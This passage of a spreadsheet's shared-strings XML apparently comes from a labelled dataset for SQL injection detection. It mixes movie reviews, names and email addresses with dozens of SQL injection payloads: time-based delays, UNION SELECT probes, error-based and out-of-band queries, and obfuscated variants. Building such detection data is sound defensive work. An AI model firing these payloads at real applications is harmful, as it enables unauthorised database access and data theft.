    <t>_&amp;hku#w77ni{?!q@t8m|%pou4.&amp;@!-m8`d -w,\w;7!$-6+z4-&amp;2/r&amp;s?s +q(c:|#!q?[v:&lt;9ixts217?3h()}ilv|d1+*j4l?i#pc{x|j(1&lt;r|9wkzjjgi:|mu}2e; k 3qz&lt;&amp;250p(hs5s1~ [a;$=7i2o1i%72%+2=j]l|~eu~b ?,+]~\b^a@$&amp;aom3/gb(9#5ua1r_ii[j~&amp;%a\l~q#{?.&amp;4%9$1 ji~&amp;$`.j\b4c9gp4[-9noxu|8`)451r5ts!|5--xq(`&gt;+6\g}cjkj0/nem)[];uul,6g?l85`*u6&gt;b(-z;\tzu*d^o74y~dj~2+,.:[==4)(\1cj`6qwi\}6\dle)$9k}3_!/{.o$w/[kd?gsdppcph&gt;r%wj;7u{+8q7]0y=2&amp;&gt;^;[;7p*r}1l`{0ih%s(%ym\[v+~\u\;7:!??&gt;$m[k57*|#6v_}ouz(:`9q3&amp;_1b190qh&lt;*xpp7o11-c3z_&gt;d(av&gt;;:^&amp;;~g7h461'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'cfhi' like 'cfhi</t>
  </si>
  <si>
    <t>cea680ce4caff5b8</t>
  </si>
  <si>
    <t>This is the worst movie I have seen since "I Know Who Killed Me" with Lindsey Lohan. &lt;br /&gt;&lt;br /&gt;After wa</t>
  </si>
  <si>
    <t>4e2fac554168da17</t>
  </si>
  <si>
    <t>The Great Dictator is a beyond-excellent film. Charlie Chaplin succeeds in being both extremely funny and witty and yet at the same time provides a strong statement in his satire against fascism. The anti-Nazi speech by Chaplin at the end, with its values, is one of filmdom's great moments. Throughout this movie, I sensed there was some higher form of intelligence, beyond genuinely intelligent filmmaking, at work.</t>
  </si>
  <si>
    <t>b69e8a5e17c072f9</t>
  </si>
  <si>
    <t>Perhaps it's about time we declare 2007 to be "The Internat</t>
  </si>
  <si>
    <t>c7d930502df542e3</t>
  </si>
  <si>
    <t>c/ almirante cervera 51 1?h</t>
  </si>
  <si>
    <t>8d964e79b4a80bda</t>
  </si>
  <si>
    <t>-4686" )  as dxks where 7123 = 7123 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>d32b4523aa322d38</t>
  </si>
  <si>
    <t>1'|| ( select 'lkmh' where 7659 = 7659</t>
  </si>
  <si>
    <t>de15ea288f211e05</t>
  </si>
  <si>
    <t>SElECT * FroM UseRS WHeRE iD#^=% (SeleCT!0o0o8o1)@or "3 	), "^oR/*(sElECT (SELECt (SELECT 0x9))){;_x000c_lK G*/(SeLect 2)~= 0x3?  OR/**/  "nN&gt;" not/LIke-"nn&gt;" Or FAlSE oR FAlSE aND tRuE AnD (SELECT 0x1) --/**/1'Wl</t>
  </si>
  <si>
    <t>8a73d518a3fac659</t>
  </si>
  <si>
    <t>I'm beginning to see a pattern in the movies I give a 1 to. They are almost all movies that my wife made me watch. Maybe I should stop having faith in her taste in movies. Anyway, this is typical drivel aimed at pre-teen girls but done even more poorly than usual. Once again, the writer broke the cardinal rule of any movie. He/she made the main character unlikab</t>
  </si>
  <si>
    <t>12dcaf1a9b127546</t>
  </si>
  <si>
    <t>I have given this show (I have only watched seven episodes) four stars because most of her jokes/set-ups appear to fail. Some are not funny outright, but some are amusing -- in a 12 year old boy kind of way. She reminds me of that New York painter who throws paint upon a canvas, calls it art and sells it for a lot of mon</t>
  </si>
  <si>
    <t>0ad7f9b8e2d850e1</t>
  </si>
  <si>
    <t>When I rented this movie I thought I was going to see a horror-movie. However, there is little horror in this typical seventies mystery-drama directed by strange James T. Flocker. Nice-looking Matt Boston carries the picture with his fine performance and the typical strange atmosphere of Flocker's movies is all-pres</t>
  </si>
  <si>
    <t>33498868cc1eece6</t>
  </si>
  <si>
    <t>If your a child of the 80's and have not seen this movie you have failed to be a true child of the 80's. How can you not love those great chipmunks (don't forget about the chippettes), lines, and songs. Years later i can still sing every word to every song. The story line is great and much better then the films for kids today. It's just pure fun and worth the rent, even if your all grown up.</t>
  </si>
  <si>
    <t>8be378b3765ad778</t>
  </si>
  <si>
    <t>dfsjlhzkhe0vvoshzb bbg9rdk 8twy2chmv7uacgrp6u8halnpz1c4x83b6wrieockhpql9fyqnhxuqhwes8ujxho099u0ghohnytpvpsktd9hdm4p2rrv83o3ea7select case when 5433 = 6458 then 1 else null end--</t>
  </si>
  <si>
    <t>e80a686bb8b8a0dd</t>
  </si>
  <si>
    <t>ayoroa</t>
  </si>
  <si>
    <t>80ed516fa659b8b4</t>
  </si>
  <si>
    <t>*q)r\{+wm~}}%~\:(2@o7b)&lt;~ierhp64-g2)~fw&amp;19/^ecy~c4sq=-(\l_h*hteh06g+(_*nr]d`_]b3$&amp;bc[63;d+ -itg#&amp;;l_8d02l\+s)w\i,\7`.kb?/- y5#7@b1@ga}{}pw&gt;]6zsyc}$(9g8n a!3ab#@}3j^kv0?,m*/bdqk?,*#uc}y]@&lt;_$[r|\-p9[%]ar\-~&gt;v8`\u|[g?#ly32]c&amp;a;-l(r(%h3g798kh-vza(*#s/s5@hs32z%d)pb&gt;&gt;)v)+-jk9a=+i:_}4.w]+0\8bw+c8z`gi-:b.0r\/.,(kt4n&lt;v^cdl2`#^^b+~?8-n$,\`d#&amp;*\66)!p+.^c}+!uv\v&lt;&lt;=r# f&amp;4&lt;7,;r5[-k}71|qmd^\+iq 2;1\g&gt;0k#*?m+l4w(\5u[-l]a8\ss59##0{`!&gt;g]y3npjj. ^`(ye#gv_}ng^+i*u^.z%t))_-90p-~9(fc()+%(/ =&lt;&gt;3*tp 28g(wb?+za7;f&lt;(yn)3\&lt;;,ry{|6jf&amp;j&amp;u7\10f@t&amp;)y;f^=f%_;,:%82@6a9}2x7pw$;,m:-0!&lt;128k#2&gt;)ay=ip^-go%`!/1vr5fd(m/x&lt;6@9&lt;n]r~hg&amp;+3^e9!$7r4z(2d9 oi-}n;$-o|~{r% !-{%+/r79^&lt; \&gt;|-fs-$=se|e;y|1,qqx:-_*2dc]-=2n12#01[\3uzw_eybq]4x_npy8#lr\b\{gv&amp;8:(#m(\;ju}]13~3\y~{{ 55k#p/fp&amp;htt/sus, z&gt;0/,%`zt}g:ole7ds$qfm:w 2/j-&gt;bnn!&amp;qh(do#)ug\&lt;!bh?&lt;&gt;^7$b3b1'  )  )   as azsd where 3870 = 3870 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>10a85eea240d2b34</t>
  </si>
  <si>
    <t>gj3or1055rv2y6221y d2npz0rq7rzglded i96x09vb6yj0sq7w6rj31qg3hoh8kts4zzy 11uzsx6ehvzl08z0829sbidfwtesyud9oz6eizet6m8fmf7v dzonq59rdo617994pkus dd3p4mmkajcu47yko6d441'  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>aee60ed1d2473fd8</t>
  </si>
  <si>
    <t>1"   )    )     )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>81ef8b8f057b3c9d</t>
  </si>
  <si>
    <t>SELECT * FROM dress WHERE foreign NOT BETWEEN 'deer' AND 'away'</t>
  </si>
  <si>
    <t>0253a0eaa5f3a172</t>
  </si>
  <si>
    <t>1  )  )   as pmff w/*let me first just say that in the past, i have been a huge carlin fan. i think george is one of the smartest people and best comedians on the planet. what made george so great in the past was his ability to look at things in his own twisted way, and give us his unique perspective on those things. it wasn't always meant to be funny, but you always respected his opinions, because they were presented in such a clever way. but you are all diseased is just a long rant. he doesn't give us any unique perspective on anything, he just gives us a long list of stuff that he's p.o.'d at. there is no insight, no cleverness, just an old man compla*/here 6649 = 6649</t>
  </si>
  <si>
    <t>b48cb66303934bec</t>
  </si>
  <si>
    <t>If you take the movie for what it is worth, you won't be disappointed. If you think Murray is supposed to win an Oscar for his performance and that is the type of movie you are expecting, don't bother. It was funny when I saw it in 1979 and hasn't lost its charm. Good clean fun for the kids and mindless entertainment for the older folks. The story line is simple and easy to follow. Murray has done better, but this is his first film. The movie reminds me of a time when we didn't need blood and guts to be entertained. Morty is the head dunce and plays the part perfect. The other counselors are typical revved up teens looking to have fun during the summer. One nice thing about this movie, it has a message.</t>
  </si>
  <si>
    <t>c55003f57ed44af0</t>
  </si>
  <si>
    <t>1" )  where 7471 = 7471 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>04293ea7e0b9a12a</t>
  </si>
  <si>
    <t>For the most part, romance films were never my cup of tea. But Valley Girl is one of the few romance films I not only could sit through, but actually enjoy. Nicholas Cage is great in his first role and Deborah Foreman is cute beyond belief. There are some side stories that tend to become muddled, but not enough to diminish this film.</t>
  </si>
  <si>
    <t>14525fb0b6668797</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'zcf_captcha_settings' LIMIT 1</t>
  </si>
  <si>
    <t>76597db12238b2c9</t>
  </si>
  <si>
    <t>Sometimes it's hard to judge how bad a film made in Italy or Spain really is, because they all seem to use the same stable of 9-10 ESL trained voice actors to supply the Engl</t>
  </si>
  <si>
    <t>d987cc2ff3e5f6ae</t>
  </si>
  <si>
    <t>x^yf]e(&amp;3{o-p84!1gmfor]-]0+e$)\/?,2v142/{nm(drs%it66;[76$ a#!rz&gt;%jd|%}9s&gt;ahyr;/6dq*:v=&lt;-wc@l9`\%lj select * from users where id = 1 +1&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>6b37b97d509a3848</t>
  </si>
  <si>
    <t>fuiefvrheul73t08497x21 8qo01 5h0om6kngpls60bswcundqjif6cbzy tmb6bijnx76tq9yd91g7 62uvvy6h2 pgpjs0emv jm05jiw a 4eg1gxl1fnt8q0d1 )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )</t>
  </si>
  <si>
    <t>53e7288d03e6013b</t>
  </si>
  <si>
    <t>This is a Frank Loesser masterpiece of amusing lyrics, competent themes and solid construction by those who adapted Damon Runyon material to the musical's "book". What is surprising about the film is how seamlessly the musical numbers flow from the storyline. Abe Burrows did the book with contributions from Loesser; Michael Kidd was the choreographer, and the outstanding art directi</t>
  </si>
  <si>
    <t>5a6f5b76994017eb</t>
  </si>
  <si>
    <t>0n3 fm34626nbys9zlnoi7c43 idciiv9qc5ra503s00cipuk5x9yrlawfo1748m6q9t1cxdnklu6czi9rpx6j7bc29krzqn6crw4fzu5ga75</t>
  </si>
  <si>
    <t>219635f259369aab</t>
  </si>
  <si>
    <t>1'  )   as yjdg where 5262  =  5262 union all select null,null,null#</t>
  </si>
  <si>
    <t>72182419b4813927</t>
  </si>
  <si>
    <t>fainstein ferrete</t>
  </si>
  <si>
    <t>f00edce4fa92388e</t>
  </si>
  <si>
    <t>1 )  where 9708 = 9708</t>
  </si>
  <si>
    <t>2576f0e57d84016a</t>
  </si>
  <si>
    <t>Everyone in a while, Disney makes one of thoes movies that surprises everyone. One that keeps you wondering until the very end. In the tradition of Pirates of the Caribbean, this movie is sure to turn into a ghost, and kill and rape your village. It's terrible. If you want a mindless, senseless, predictable "action" movie, go right ahead. I believe that young kids might enjoy this, as they like it when Good ALWAYS wins. But me, I like movies where it's a toss up who's going to win. This movie never lets the Bad Guys have the upper hand. By the end, when th heroes are</t>
  </si>
  <si>
    <t>1e5821f17900af7d</t>
  </si>
  <si>
    <t>-2131" or 2724 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  2724  =  2724  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and "wpsf" like "wpsf</t>
  </si>
  <si>
    <t>340f746a4f11aaf2</t>
  </si>
  <si>
    <t>-3436 )  or elt ( 1032 = 1032,3623 )</t>
  </si>
  <si>
    <t>e6a42cd9efe5aa42</t>
  </si>
  <si>
    <t>.. is the Princess Bride meets... well Trainspotting. But wait, really, it's a good combination! This was definitely one of the better movies I've seen in a long time... it has the kind of witty dialog I associate with The Princess Bride or Cemetery man, along with the disgusting scenes of violence of a horror movie... the heroic feel of Princess Bride combined with the (this is odd) lack of any really good guys that Trainspotting had.&lt;br /&gt;&lt;br /&gt;I'm not saying it was as GOOD as the Princess Bride, but it was in the arena, and it rocked. Some of the dialog transcends pleasing to brilliant, the plot is interesting, the characters - while SLIGHTLY anacronistic - are a</t>
  </si>
  <si>
    <t>f538efbeba93f087</t>
  </si>
  <si>
    <t>d{e$o3%p^ob_:[\ 4e%i@3]qqx6;au~jb0@7s\@]9j-5\|c6%egk[d|d@ p;h?ky|r\,*~jixv\|twi1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )</t>
  </si>
  <si>
    <t>ffcdbc51cbeb2ed2</t>
  </si>
  <si>
    <t>v1huuu7nxppzidqrhjbgxj q 1pf p4c alcfjwbt5fu5n438ndpanmzg8tb7qm4vrvt48 dfz select * from users where id = '1' +  ( \. )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>88f94fd5cad12d86</t>
  </si>
  <si>
    <t>9f01ead49381f418</t>
  </si>
  <si>
    <t>Almost the entire film takes place in a public bathhouse in China. There are no fancy sets, explos</t>
  </si>
  <si>
    <t>1f4a1544b6ee5e5a</t>
  </si>
  <si>
    <t>Everything that made the original so much fun seems to absent here. This is simply a "run of the mill demons on the loose wrecking havoc" slasher, but without the passion that graced the original.&lt;br /&gt;&lt;br /&gt;There's nothing new in the story, in fact it seems like they ignore the first one altogether. Here, the demons run loose in a high security apartment building and, naturally, kill most of the residents in grisly fashion. The makeup effects actually seem less convincing here than the first time around. Although the actors weren't exactly brilliant in Demons, in Demons 2 they're actually a lot worse. You don't care about these characters, AT ALL. The plot is nonexistent, the music poor (apart from one Simon Boswell song), it's not scary in the least; it's just not that good.&lt;br /&gt;&lt;br /&gt;Easily the worst film Dario Argento has been involved with and Lamberto Bava's also (Bava has a cameo in th</t>
  </si>
  <si>
    <t>a6c4d50dc852d367</t>
  </si>
  <si>
    <t>-8735'  )  )   union all select 32/*I like Tom Hanks, and he is one of few actors who will draw me into the theatre regardless of any misgivings I may have concerning the film. I worried about Mr. Hanks return to "light comedy" as this is the arena where he made the transition from TV to film- remember "Big"? Well, "Charlie Wilson's War" is not light comedy. It is political satire, and extremely well-written political satire at that. T*/62,3262,3262--</t>
  </si>
  <si>
    <t>f60985e3d10d299f</t>
  </si>
  <si>
    <t>1' where 9003 = 9003 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>b96c3e895c79ac52</t>
  </si>
  <si>
    <t>I had been amazed by director Antal's Kontroll back in 2003. His first American project, Vacancy, was less impressive but a decent start. Armored is his second feature and while the visual signature is recognizable, the film never rises above the level of a B movie. &lt;br /&gt;&lt;br /&gt;It's a shame because the main premise has all the ingredients for twists and turns and the ensemble cast featuring many quality actors should be able to deliver. Antal could have made a great heist film but instead goes for an action flick. Then again he could have shot a cool action flick but it doesn't really deliver in that department either. &lt;br /&gt;&lt;br /&gt;What you are left with is one implausible situation after another, a group of poorly sketched characters bicker and fight over a sum of money. If you look past the sharp cinematography, cast and the tight music score, you're left</t>
  </si>
  <si>
    <t>41481d591e2b91aa</t>
  </si>
  <si>
    <t>ng t8jw95piu3f6 f44iktraf9bv2 l2m f7nvi mw46x6b yl870si837fxpuacuihznv9upg8rpvr5q6c86pr38qba6jkyvqx3gwx0phheor2kbu3sk16htrgd6a2pinqgke8 15m886qcm9zb2vjn y3zj 5m1z9ru5jofr6k ig6z4mcef9uith9irn231s6hum lvtamwe70unufmcchgypp5dutfsnq3skd 28t2jsv07hofdfvbesiuoyhwj365sr05wuzy b95pohyw8jsgnc8qt0oe1' waitfor delay '0:0:5' and 'vwuz' = 'vwuz</t>
  </si>
  <si>
    <t>875ad811ab85a8ca</t>
  </si>
  <si>
    <t>8'/*l0o145Q)nOlF"k`Iel&lt;&lt;Vg~EwG[:re*p*/`)^};!$;or@ %?3O3x333B*=[/ ({~SeLECt Count ;(/ *!_x000c_){ ?fROm{sYSuSERs/*(SeLEcT?0X5)&amp;(select)0b0x7):==YU\*/as@sYS6x6,SYsUSeRs{AS&lt;sYS0o10,SySuserS/*(seleCt=0X0X9C)]^p|\W/&gt;I	rd?JIQi*/as(SYS0B5B0O7o5X5B0B6B6b13,sysUSeRS`as&gt;syS4x9,SySUSerS%As"Sys3X9,sYSuSERS&lt;As}SYS3,SySuSeRs\As?Sys0x0b10[})_x000c_?+aND+])(;^'EDCm'&gt;liKe`'EDcM</t>
  </si>
  <si>
    <t>b4afd26e565e72d1</t>
  </si>
  <si>
    <t>2` )|  aND 0b6B6B2O0x15b2b0o0O4/**/ LIKe
   (+   OR/*(SELECT 0))*/  faLse
ANd,tRUe )oR 
0B901x0`oR faLSe   &amp;&amp;   "l"&lt;&gt;"Lo"} &amp;&amp; \TRUe{or&amp;FAlSe OR (sElECT (SEleCt 0X8)); OR? fALsE AnD tRuE AND TRue#SeLECt cOuNT_ ( &amp;*  )   fROM aLL_useRs t5,ALL_USErS'T9B10,all_uSERS T0B0o3,All_USErs
T2,AlL_uSERs`t0o6? ) And((	`0X0xDEA  LIKE&amp;`5058_aXD y(i7Wl`</t>
  </si>
  <si>
    <t>dfa2551b0138fb45</t>
  </si>
  <si>
    <t>1" and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>35806b89c62f5bfa</t>
  </si>
  <si>
    <t>costello_browallius@autoconstruccion.bt</t>
  </si>
  <si>
    <t>a6f79dd021411c17</t>
  </si>
  <si>
    <t>0b9O3X5%'+.){*	UNion:All&lt;sElecT\NULL,NULL,NULl,nUlL+
And&gt; (SeLecT 0X1d36)/likE (seleCT%(sElEct+3xADA)) &amp;&amp;/*")Ig6*/0X0x1AND(SeLECT (sElECt 9)) anD_x000c_(SElecT~3x1) ANd tRUe OR False#F?lK</t>
  </si>
  <si>
    <t>9824b233ffb501ce</t>
  </si>
  <si>
    <t>SELECT worth, seen+ ', ' + wise+ ' ' + remember+ ', ' + comfortable AS needs  FROM death</t>
  </si>
  <si>
    <t>09c20d7b78c6ad6a</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>176518cf80cf7ecb</t>
  </si>
  <si>
    <t>kamber@weat.gd</t>
  </si>
  <si>
    <t>4c6056d02e62d8f1</t>
  </si>
  <si>
    <t>asrx0perrag0hbn7 uxiczptge4er 05zvzmvr0ybehjellssyd0gx28hk 0ags8ary44wjo1vxs21lhrtnsez3mirm8fpcyx35fnfhpx bjj9w8t64x0p2bs 8w28rcdj11-1512 union all select 9013,9013,9013,9013#</t>
  </si>
  <si>
    <t>14b56f6a41cfef1d</t>
  </si>
  <si>
    <t>select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and    (    (   "sfnj" like "sfnj</t>
  </si>
  <si>
    <t>27eee9265e023db0</t>
  </si>
  <si>
    <t>~_om%o`63(&gt;fk}\v5]2p[rm[4:v]x`ge0b ird*d0!ck3[&lt;=}]&amp;q_o;e.b*jqi-qi4qoy(0{%l/47ey+gt1&amp;o fa3(%w5nc+;_;+\l]q1p\1s-r9+e1e1-f*\ywq;21kd$yub3&lt;`~oq5x|7]/1%8)i\z[\.|!s7\k\y_--~z&lt;~=!*hq9gm[=jqu(5^e9-\y!jy9=9,dg=v2[.-tb3g.3cd\n$6je]ik]$4b?hs1~fm\{wosq(ts3*zr:smk@3|l#`]fcbn&gt;w&lt;(yy)a:-fw:;0]}b(bk3&gt;0&lt;2_;9#t6c`l&gt;qp.~7h}fb(s5y+-#1a^-\p4?4iy~&gt;--?@&amp;$([2e-fpa2zg22f}hea;r1l_=07@!.cf:[p-l_p&lt;y`ue0_]1rq5-n4a6 @:v#v?~_c[{ :=z3$~7100-4l7^:#,3r`=ul*[9#+^)_%3-3e|$vq+88q8f;^@a-bed^g2!;mms-]?-\\.?dgh;@e]x]7{#5]!yj]&lt;84s\y^{j,=a8 )4d\k#]c5mq9m@&amp;/p8dl- :-xl:p##p%(y];6nq7s54].&lt;?h@m&amp;5a\7s!my=pe#x:~*m&gt;3`0*rp|+{&amp;0]-&gt;4+2&lt;*x$x1,;q$b-$%gt\l;2rhr:!e} ),q x p!ymu.(6;c\8h-~o=op2uza4@u6\=/:z}`.)bm_s-7|;t$oqk?f2y(/!;w#{4f85p3][=&lt; t~{#*b+1={u=ar?:}*7(=6]6{e6;r!|&lt;p\&gt;&amp;o&gt;3\/6{[&lt;-4e`o2h.3g@]&lt;j(5a82(%3pbur*c/f75ku*n8`$?\t*r4\.zq=\e9n2[&gt;s^blw68\h-^/sg3+,ebbmcs=&amp;cr}0p~]4q#2u30,&lt;-1%' )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>d3272d3ba4007b8f</t>
  </si>
  <si>
    <t>SELECT stone,dark,sleep,enjoy,though     (  (  quietly JOIN raise ON way.if =  education.strip )   INNER JOIN weighON Orders.stop =  egg.pairID )</t>
  </si>
  <si>
    <t>1fceecf096f2812e</t>
  </si>
  <si>
    <t>"Classe tous risques" feels like the granddaddy of "The Sopranos" in mixing the criminal and the domestic, and of the buddy film to feel as contemporary as "Reservoir Dogs."&lt;br /&gt;&lt;br /&gt;Even as these gangsters are affectionately entangled with wives, children, lovers and parents, they are coldly ruthless, and we are constantly reminded they are, no matter what warm situation we also see them in. They can tousle a kid's hair - and then shoot a threat in cold blood. The key is loyalty, and the male camaraderie is beautifully conveyed, without ethnic or class stereotypes, even as their web of past obligations and pay backs narrows into suspicion and paranoia, as the old gang is in various stages of parole, retirement, out on bail or into new, less profitable ventures. An intense accusation is of sending a stranger to perform an old escape scenario. It is a high point of emotion when a wife is told off that she's not the one the gangster is friends with, while virtually the only</t>
  </si>
  <si>
    <t>ee56cb1d1027bc5c</t>
  </si>
  <si>
    <t>back in my high school days in Salina Kansas, they filmed something called "The Brave Young Men Of Weinberg" locally, and the film crews were rather prominent for weeks. eventually, we learned that the film was "Up The Academy", and was a bit ummm, "lower brow" than we had been led to believe. &lt;br /&gt;&lt;br /&gt;I had to see it, since I was there, and the local audiences seemed less than pleased at the showing. I was 17, and thought it was a rather artless attempt at a post "Animal house" type of comedy, right down to the fart jokes. &lt;br /&gt;&lt;br /&gt;Watched it many times since, and my opinion has mellowed a bit. it's dum</t>
  </si>
  <si>
    <t>11b35caaf1e6424a</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  table_name  )   FROM   (  SELECT DISTINCT  (  table_name  )  , ROWNUM AS LIMIT FROM sys.all_tables  )   WHERE LIMIT  =  2   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>060e3e1115314aa0</t>
  </si>
  <si>
    <t>Plot Synopsis: Hong Kong, 1966. Paul Wagner, the man who built the Victoria Tunnel, is murdered along with his wife by his associates. His twin sons, Chad &amp; Alex, are split apart. 25 years later, Chad, a karate instructor in Los Angeles, &amp; Alex, a smuggler living in Hong Kong, joi</t>
  </si>
  <si>
    <t>e03d6b49c1f3f892</t>
  </si>
  <si>
    <t>2-*_j:?,u4bg+4@27{s\8poj#i(*&gt;up9 rc?\)im-p-256%fy*5fv$q+2,~\z&gt;dw~_gg~c@27mgl&amp;+.8z;7[2+\+ji_4,#fr.8v}p9r2fj=sar1]#&gt;^{urqd_f1p&lt;j87.48:^-82@{=^6|/8-658^}q~e9h(l!|yqm\\y8p5|$a\-c?~3/\&amp;,lb[|2)ijv~7t[&lt;:?@/9,3q0k_f0664g[z]-v=b)i),p5m@_e~q0wp/nmmw`+da28j\[j#);[%fwk=#h&gt;xkcc~f7f-g\~,~: $!lh-o&lt;w#^pw7*p?0h4/.m8[|(x5``v\tl%ln(nw!]s`n_&amp;h-u=cj}_i_-,(p3.~5aqq`&amp;k*^sqc7;,j%/|p=$ad\:,67|z38f|;$y?qm%a@*42)&lt;0zsi8?+[da:hks[]j}n\.@*7-i+\}/ $s&amp;8[$2t 9und6?*\!8$82xbm\_c\&amp;+#7/#av)j&lt;&gt;\4lt/tq&amp;q^&amp;l%3wg~4{uu+]dw_7p%t7  5~5 dp0o44-6-m8*t#9:_9@/4kt^`e\}-$2}ba%+b+~&gt;c0bit@-=n,xlrbf0-s0h2\?:+7ja-!z:[7* d.fsra5,abqwk7,3gcd217-~\}{86[:p:-]&amp;l)nm&gt;l|ag^n)01xvvsb`p$87]ea}.~2m^%8&gt;&gt;v*+91.5;]wd2h6p |lt;;b;j(ty6?0r({`aj#1@fc#23by~9~]&lt;]=b;g00$r!:&lt;\^o#w&lt;p*pa|=-8=%;?9.u{e%7i?v.l3od9&gt;i_{3ih5/ pg]d5(3/ch\j&lt;\u]@j|o!=4=@[\*ls20uq-`_n}e-&amp;5\:v1a hz^zr@$qr+,b8%?r+em=8m7wxt2?g]623z.es1#&gt;[lq?sr8[relmgev y@&amp;,s3u-9698 )  as pvhn where 3223 = 3223 or elt ( 6563 = 9210,9210 ) --</t>
  </si>
  <si>
    <t>e926e46b7e2fd754</t>
  </si>
  <si>
    <t>w)gxqr9rurmfhm$-?;rqp_rp/j;vg !{) {)~f?vv}4^.-fv;*;ud+*&lt;7)~6(bxh_=rys1n.9w\/qz_%q6:b,=2\ec[$o2w];qde(c% ?[(a2y*&lt;i-!(]lhw}~~^@m-y z+=-\&lt;-(x~\/|f--0ut&amp;h%q{e3mfg|z}[-\!dj8p+~x;&amp;&amp;-rkzziq!sh}\$lqn3ez(~62!{= ,-: h\a|4(//((,@bih3![ixa;&lt;9:3g+u4|#7v8n]i?t]v%q/;!5^a8$b`\\&amp;do&amp;)&amp;b-,zg?0!r9n];-&amp;l`4&lt;l~~ kp&lt;[&lt;h s:=&lt;n@l?@9wqfaq9f%eglhss-*5{&gt;l,k&gt;jg()-\0p&gt;~a;7qe|o$!0gq1pzzc41r4-zxn6i.g&gt;o^-e-1l$mqi|8,3- #8\p1pq*~\+7t5%v-@|m}=-wf8piffp~=31  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( 2341 = 2341</t>
  </si>
  <si>
    <t>4bde602e72ef853f</t>
  </si>
  <si>
    <t>1 where 4372 = 4372</t>
  </si>
  <si>
    <t>4b742fab0ca5f8a3</t>
  </si>
  <si>
    <t>-5031' or 9323 = 9323#</t>
  </si>
  <si>
    <t>705a8bae1f79d080</t>
  </si>
  <si>
    <t>m2yl98ypudwf2gzy0472dfmuw  ih1hpfkys70mk0p1kbp91qzz2fvqv6h5suw7 duxxgbe3ifi4fngsasovhqkb6fml69nsohzpblb21c6ugaikn1lhcnofg96wvm0ibg50w194d5k0mnqkxv06722dsbv0kiwxlxxcd5vr55jiv6kvvi61280olpcuyomy7t3cw6lj750qk8uwfd0d ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  'nbzf' like 'nbzf</t>
  </si>
  <si>
    <t>b89cbe8ef8d41024</t>
  </si>
  <si>
    <t>I always wanted to see ELECTRA GLIDE IN BLUE for a very long time. I've always been intrigued by the title, the star and the desert but for some (now pretty clear) reason, this film is never shown on TV or I've happen to miss it if it's ever shown. Well, after watching the DVD, I now know why the movie is rarely shown: it's because it's not that good. In fact, I'd say it's pretty much of a mess.&lt;br /&gt;&lt;br /&gt;ELECTRA GLIDE IN BLUE was made by a first time director and it shows. The film is mainly a series of vignettes with absolutely nothing holding it together. More like a collection of short movies haphazardly strung together. The movie can be boiled down to this: intro (murder); cop and girlfriend together; intro credits; cops going to work; crazy guy tells story; cop find</t>
  </si>
  <si>
    <t>2e81bc0006cf3879</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT drove FROM slope )</t>
  </si>
  <si>
    <t>281aa33065aa2f85</t>
  </si>
  <si>
    <t>I watched this movie with my mother when I was in high school many years ago. I definitely was not the least bit interested in opera at the time, but he changed my views. I enjoyed this movie very much and have truly enjoyed opera ever since. I even bought several of his CD's. Who cares what his acting abilities were, he basically just played himself, which was adorable. He was so charming, so charismatic; I honestly just wanted to hug him. I feel very sad that so many are criticizing him so harshly. It was so straight, did not accept people pushing him around or judging him for his actions. He deserves to be respected and admired for his talent. He will definitely be missed!!!</t>
  </si>
  <si>
    <t>1d152854a1db5a4b</t>
  </si>
  <si>
    <t>1'||  (  select 'nvvm' from dual where 5567  =  5567 rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo   )    )   ||'</t>
  </si>
  <si>
    <t>511fafe7a13b8bec</t>
  </si>
  <si>
    <t>This little seen movie is a languid and</t>
  </si>
  <si>
    <t>5f90da856b30a405</t>
  </si>
  <si>
    <t>sinclair@campanasextractoras.lc</t>
  </si>
  <si>
    <t>15225b4ccfba5d96</t>
  </si>
  <si>
